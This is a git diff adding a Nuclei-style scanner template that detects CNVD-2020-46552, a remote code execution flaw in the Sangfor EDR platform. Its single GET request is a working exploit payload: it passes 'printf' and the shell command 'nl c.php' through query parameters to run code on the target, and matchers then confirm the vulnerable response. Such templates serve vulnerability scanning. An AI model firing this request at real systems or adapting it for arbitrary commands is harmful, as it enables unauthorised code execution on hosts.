diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml
new file mode 100644
index 0000000000..690f94e80f
--- /dev/null
+++ b/cnvd/2020/CNVD-2020-46552.yaml
@@ -0,0 +1,25 @@
+id: CNVD-2020-46552
+info:
+  name: Sangfor EDR Tool - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
+  reference:
+    - https://www.modb.pro/db/144475
+    - https://blog.csdn.net/bigblue00/article/details/108434009
+    - https://cn-sec.com/archives/721509.html
+  tags: cnvd,cnvd2020,sangfor,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "$show_input = function($info)")'
+          - 'contains(body, "$strip_slashes($host)")'
+          - 'contains(body, "Log Helper")'
+          - 'status_code == 200'
+        condition: and